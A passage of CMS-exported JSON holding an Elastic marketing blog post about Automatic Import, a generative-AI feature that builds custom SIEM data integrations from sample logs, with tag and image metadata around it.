monitoring","keyword":"log-monitoring","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:29:28.882Z","updated_at":"2023-11-06T21:29:28.882Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.371Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt3d6d3cd2ad3fce72","ACL":{},"created_at":"2023-11-06T21:35:37.967Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"visualization","label_l10n":"Visualization","tags":[],"title":"Visualization","updated_at":"2023-11-06T21:35:37.967Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.605Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt240c2986db0ba465","ACL":{},"created_at":"2023-11-06T21:31:10.051Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"search-applications","label_l10n":"Search applications","tags":[],"title":"Search applications","updated_at":"2023-11-06T21:31:10.051Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.331Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt38a6c014d6bd5ecb","ACL":{},"created_at":"2021-06-02T15:27:49.854Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"stack","label_l10n":"Stack","tags":[],"title":"Stack","updated_at":"2021-07-13T22:00:22.378Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.258Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltcd40f41ea1d31bf8","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-08-03T16:53:50.628Z","updated_at":"2023-08-03T16:53:50.628Z","content_type":"image/png","file_size":"156167","filename":"libraries-enterprise-search-site-search-dark-1680x980.png","title":"libraries-enterprise-search-site-search-dark-1680x980.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-08-07T16:05:23.025Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcd40f41ea1d31bf8/64cbdb9e5de99c3e5968d173/libraries-enterprise-search-site-search-dark-1680x980.png"},"title":"How to troubleshoot slow Elasticsearch queries for better user experience","title_l10n":"How to troubleshoot slow Elasticsearch queries for better user experience","updated_at":"2025-01-21T22:28:38.473Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/troubleshoot-slow-Elasticsearch-queries","publish_details":{"time":"2025-01-21T22:28:44.120Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt87499c7e1dc96796","_version":11,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic is automating SIEM data onboarding with Automatic Import. This feature — the only one of its kind — automates the development of custom data integrations. Elastic now adds custom data sources faster than any competing solution.","author":["blt2c6750b198c527ec","blt91eeaf08ab3d1d6a"],"category":["blt0c9f31df4f2a7a2b"],"created_at":"2024-08-05T15:22:16.181Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1a17d79d125e5942"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic is accelerating the adoption of \u003c/span\u003e\u003ca href=\"http://www.elastic.co/security/ai\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAI-driven security analytics\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e by automating SIEM data onboarding with Automatic Import. This new feature — the only one of its kind for a security analytics or SIEM solution —\u0026nbsp;automates the development of custom data integrations. Elastic Security now adds custom data sources faster than any competing security analytics solution, facilitating broader visibility and easier SIEM implementation.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eEstablishing visibility across an enterprise IT environment is inherently difficult, but no matter how the attack surface changes — applications created, systems added, infrastructure moved to the cloud — security teams can’t afford to fly blind. Unfortunately, onboarding custom data has remained costly and complex — until now.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAutomatic Import automates the development of custom data integrations with generative AI, cutting the effort needed to create and validate custom integrations —\u0026nbsp;from up to several days to less than 10 minutes —\u0026nbsp;and significantly lowering the learning curve for onboarding data. The feature is powered by the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/platform\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Search AI Platform\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, which provides model-agnostic access to harness the knowledge from large language models (LLMs) and the ability to ground answers in proprietary data using \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/retrieval-augmented-generation-rag\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eretrieval augmented generation (RAG)\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. It is also made possible by our rich expertise in enabling security teams to leverage data of any kind and the flexibility of our \u003c/span\u003e\u003ca href=\"/cloud/serverless/search-ai-lake\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSearch AI Lake\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs91ab0e81f511dcd6"}}},{"image":{"image":{"uid":"blt56ec9ce154b2a05b","_version":1,"title":"Auto Import Screenshot.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-01-21T21:29:52.188Z","updated_at":"2025-01-21T21:29:52.188Z","content_type":"image/png","file_size":"188306","filename":"Auto_Import_Screenshot.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-01-21T21:48:31.764Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt56ec9ce154b2a05b/679011d0bc1349569ed5b95f/Auto_Import_Screenshot.png"},"_metadata":{"uid":"cs7948fd2d7cc38581"},"caption_l10n":"","alt_text_l10n":"create new integration","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0a72bf99e04a118d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAutomatic Import arrives at a critical moment as organizations explore replacement options for their legacy SIEM tools. Collecting and normalizing data is among the first phases of any migration plan, starting with leveraging prebuilt data integrations. Technologies that require custom connectors typically come next, but the manual nature of building each such integration can slow adoption of the new SIEM and retirement of the old solution. Automatic Import addresses these challenges.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The impact of Automatic Import","_metadata":{"uid":"csfdb1f132774f43b9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"http://www.elastic.co/security\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAutomatic Import\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e extends our leadership in applying generative AI to expedite labor-intensive SecOps tasks by automating the creation of custom data integrations. This release builds on our previous AI-driven security analytics innovations, such as \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/ai-driven-security-analytics\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAttack Discovery\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, which automates alert triage, and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/introducing-elastic-ai-assistant\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic AI Assistant\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, which answers security questions and guides practitioner workflows.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIn May, we released Attack Discovery to reduce the toil of triaging hundreds of security alerts every day. Elastic is uniquely positioned to mitigate the security challenges intrinsic to fast-changing environments and messy data due to our ability to handle unstructured data at scale and our strategy of drawing relevant insights via LLMs and RAG.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic is complementing these AI-driven product capabilities with \u003c/span\u003e\u003ca href=\"https://elastic.co/blog/elastic-express-migration-program\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Express Migration\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, a commercial incentive program to address migration inertia associated with companies’ existing deployments and contracts and to provide an accelerated adoption path for customers.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOne of Elastic’s largest security customers recently migrated nearly 200 data sources, including many custom technologies. Future customers of this scale will save hundreds of hours of consulting time and save weeks to months of implementation time.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs71f37f800b013129"}}},{"quotes":{"quote_l10n":"Automatic Import addresses one of the biggest headaches of switching SIEMs: onboarding custom data sources. The feature automates the development of new data integrations, reducing the cost, complexity, and stress of migration.","_metadata":{"uid":"cs31d5da6cc2b6cdf8"},"quote_author_l10n":"Michelle Abraham, Research Director, Security and Trust at IDC","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs4f6775b00c51f327"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic ships with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/integrations/data-integrations\"\u003e\u003cspan style='font-size: 12pt;'\u003e400+ prebuilt data integrations\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e\u0026nbsp;and counting, and Automatic Import makes it practical to extend visibility beyond these to an evolving array of security-relevant technologies and applications. These integrations normalize data to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/ecs-elastic-common-schema-otel-opentelemetry-faq\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Common Schema (ECS)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, enabling uniform analysis with dashboards, search, alerting, machine learning, and more. Public LLMs can readily process and analyze data in ECS format because it is a popular open source data specification.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4bfe471d53f3058e"}}},{"quotes":{"quote_l10n":"Automatic Import makes building and testing custom data integrations easier, helping us quickly enhance visibility throughout our environment.","_metadata":{"uid":"cs0a8d0fe962a0fa7a"},"quote_author_l10n":"Nate Thompson, Senior Manager, Cybersecurity Analytics \u0026 Automation, Dana Inc.","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"How it works","_metadata":{"uid":"cs754d5f153eeda5c9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAutomatic Import is easy to use and available to everyone with an Enterprise license. The user specifies some settings and uploads sample data from which the feature will extrapolate what to expect from the data source. These log samples are paired with LLM prompts that have been honed by Elastic engineers to reliably produce conformant Elasticsearch ingest pipelines. Automatic Import then iteratively builds, tests, and tweaks a custom ingest pipeline until it meets Elastic integration requirements.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs65a565dd36035bcc"}}},{"image":{"image":{"uid":"bltf608b373edd29cfd","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-08-05T14:53:28.406Z","created_by":"bltb6c155cd84fc0c1a","file_size":"159988","filename":"image7.png","parent_uid":null,"tags":[],"title":"image7.png","updated_at":"2024-08-05T14:53:28.406Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-08-06T11:35:00.750Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf608b373edd29cfd/66b0e768eead60d63b895b31/image7.png"},"_metadata":{"uid":"cs69aeb44ba6a2930e"},"caption_l10n":"Automatic Import powered by the Elastic Search AI Platform","alt_text_l10n":"Automatic Import powered by the Elastic Search AI Platform","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb737665cf3cf790c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIn just minutes, the feature generates and validates a custom integration that accurately maps raw data into ECS and custom fields, populates contextual information (such as \u003cspan data-type='inlineCode'\u003erelated.*\u003c/span\u003e fields), and categorizes events.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Automatic Import supports a variety of structured and unstructured log formats, including JSON, NDJSON, Syslog, and CSV. Popular large language model (LLM) providers, such as Amazon Bedrock, Google Gemini, and OpenAI, are supported by Automatic Import for integration generation.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Automatic Import in action","_metadata":{"uid":"cs021f97e9c4694201"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLet’s say you want to onboard audit events from Teleport, a tool for securing access to infrastructure and web applications.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eStart by navigating to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eIntegrations -\u0026gt; Create new integration\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa3e86a5036a299fe"}}},{"image":{"image":{"uid":"bltc2d2dad96582dff8","_version":1,"title":"Auto Import Screenshot (1).png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-01-21T21:47:06.919Z","updated_at":"2025-01-21T21:47:06.919Z","content_type":"image/png","file_size":"188306","filename":"Auto_Import_Screenshot_(1).png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-01-21T21:48:31.852Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc2d2dad96582dff8/679015dae6989878d828373a/Auto_Import_Screenshot_(1).png"},"_metadata":{"uid":"cs8d42a790f5190645"},"caption_l10n":"","alt_text_l10n":"create new integration","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse4443fec95f90824"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eProvide a name and description for the new data source.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs95eaa601e616e069"}}},{"image":{"image":{"uid":"blt9ef7b781b4c303f1","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-08-05T14:55:38.267Z","created_by":"bltb6c155cd84fc0c1a","file_size":"149863","filename":"image5.png","parent_uid":null,"tags":[],"title":"image5.png","updated_at":"2024-08-05T14:55:38.267Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-08-06T11:35:00.517Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9ef7b781b4c303f1/66b0e7ea792c8e1f9847d65a/image5.png"},"_metadata":{"uid":"cs8a334024d4820796"},"caption_l10n":"","alt_text_l10n":"integration details","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs100a328031bb1fdd"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNext, fill in other details and provide some sample data, anonymized as you see fit.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs84afaaa1ccd0973f"}}},{"image":{"image":{"uid":"blt2f24cc02bde01155","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-08-05T14:56:09.588Z","created_by":"bltb6c155cd84fc0c1a","file_size":"169295","filename":"image8.png","parent_uid":null,"tags":[],"title":"image8.png","updated_at":"2024-08-05T14:56:09.588Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-08-06T11:35:00.389Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2f24cc02bde01155/66b0e80992f8d0ed68087455/image8.png"},"_metadata":{"uid":"csac644cba75730c09"},"caption_l10n":"","alt_text_l10n":"define data stream and upload logs screenshot","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc45bd25d425f5e35"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eClick “Analyze logs” to submit integration details, sample logs, and expert-written instructions from Elastic to the specified LLM, which builds the integration package using generative AI. Automatic Import then fine-tunes the integration in an automated feedback loop until it is validated to meet Elastic requirements.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csb1996225abc1ad84"}}},{"image":{"image":{"uid":"blt0e8a1ceef586519a","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-08-05T14:56:36.522Z","created_by":"bltb6c155cd84fc0c1a","file_size":"159377","filename":"image1.png","parent_uid":null,"tags":[],"title":"image1.png","updated_at":"2024-08-05T14:56:36.522Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-08-06T11:35:00.740Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0e8a1ceef586519a/66b0e82492f8d043cd08745b/image1.png"},"_metadata":{"uid":"cs6632d632b449f776"},"caption_l10n":"","alt_text_l10n":"analyzing","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs24f9db3857ae9a50"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAutomatic Import presents recommended mappings to ECS fields and custom fields. You can easily adjust these settings if necessary.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs66542a247c2d7de1"}}},{"image":{"image":{"uid":"blt09d6e79dc9b67cb1","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-08-05T14:57:01.925Z","created_by":"bltb6c155cd84fc0c1a","file_size":"175050","filename":"image6.png","parent_uid":null,"tags":[],"title":"image6.png","updated_at":"2024-08-05T14:57:01.925Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-08-06T11:35:00.759Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt09d6e79dc9b67cb1/66b0e83d792c8ec6b947d66b/image6.png"},"_metadata":{"uid":"cs894505833ff54b74"},"caption_l10n":"","alt_text_l10n":"review results","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs543e0f7dd825d547"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAfter finalizing the integration, add it to Elastic Agent or view it in Kibana. It is now available alongside your other integrations and follows the same workflows as prebuilt integrations.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csf83d99ee0bf94ec3"}}},{"image":{"image":{"uid":"blt51104670f1db5617","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-08-05T14:57:30.933Z","created_by":"bltb6c155cd84fc0c1a","file_size":"95882","filename":"image3.png","parent_uid":null,"tags":[],"title":"image3.png","updated_at":"2024-08-05T14:57:30.933Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-08-06T11:35:00.368Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt51104670f1db5617/66b0e85a0efc69f290886720/image3.png"},"_metadata":{"uid":"cs390b2d5b17ae9489"},"caption_l10n":"","alt_text_l10n":"success","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7c686967014a652e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUpon deployment, you can begin analyzing newly ingested data immediately.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs65d75b9aebb8d69f"}}},{"image":{"image":{"uid":"blt079ce0a6ead2ae96","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-08-05T14:57:52.934Z","created_by":"bltb6c155cd84fc0c1a","file_size":"284647","filename":"image2.png","parent_uid":null,"tags":[],"title":"image2.png","updated_at":"2024-08-05T14:57:52.934Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-08-06T11:35:00.719Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt079ce0a6ead2ae96/66b0e870ae971f286cf0f0de/image2.png"},"_metadata":{"uid":"csed0279ef39256896"},"caption_l10n":"","alt_text_l10n":"users","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Fast-track your move to AI-driven security analytics","_metadata":{"uid":"csbe7863e4292c473f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAutomatic Import lowers the time required to build and test custom data integrations from days to minutes, accelerating the switch to \u003c/span\u003e\u003ca href=\"http://www.elastic.co/security/ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eAI-driven security analytics\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. The feature arrives during a time of change in the SIEM market with many longtime customers of legacy SIEMs now migrating to modern technologies.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic pairs the unique power of Automatic Import with Elastic’s deep library of prebuilt data integrations, enabling wider visibility and fast data onboarding. In conjunction with Elastic AI Assistant for rule conversion, the feature substantially simplifies SIEM migration.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eInterested in our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/splunk-replacement\"\u003e\u003cspan style='font-size: 12pt;'\u003eExpress Migration\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e program to level up to Elastic? \u003c/span\u003e\u003ca href=\"https://www.elastic.co/splunk-interest?elektra=organic\u0026storm=CLP\u0026rogue=splunkobs-gic\"\u003e\u003cspan style='font-size: 12pt;'\u003eContact Elastic\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to learn more.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs286c5062c3044946"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd5d8322e1ca4950b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse1d8cd277af80d33"}}}],"publish_date":"2024-08-06","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Migrate your SIEM to AI-driven security analytics in record time by automating custom data integrations","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt39140cf3e2cd4550","ACL":{},"created_at":"2023-11-06T21:51:00.583Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"integrations","label_l10n":"Integrations","tags":[],"title":"Integrations","updated_at":"2023-11-06T21:51:00.583Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.083Z","user":"blt4b2e1169881270a8"}},{"title":"SIEM","label_l10n":"SIEM","keyword":"siem","hidden_value":false,"tags":[],"locale":"en-us","uid":"blta7a92715fa2dc7aa","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-07-12T21:52:53.275Z","updated_at":"2021-07-12T21:52:53.275Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-10-07T18:59:30.492Z","user":"blt36e890d06c5ec32c"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blte0256e5390d036ed","ACL":{},"created_at":"2023-11-06T20:25:43.573Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-migration","label_l10n":"Cloud migration","tags":[],"title":"Cloud migration","updated_at":"2023-11-06T20:25:43.573Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:27.667Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"title":"Ingesting","label_l10n":"Ingesting","keyword":"ingesting","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt886805f7b26ef356","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:37:57.513Z","updated_at":"2020-06-17T03:37:57.513Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:37:57.513Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-06-29T17:20:06.688Z","user":"bltea6cbb86fea188be"}},{"_content_type_uid":"tags_topic","_version":2,"locale":"en-us","uid":"blt9085022a5c6c87e9","ACL":{},"created_at":"2023-11-06T20:41:57.778Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"large-language-models","label_l10n":"Large language models","tags":[],"title":"Large language 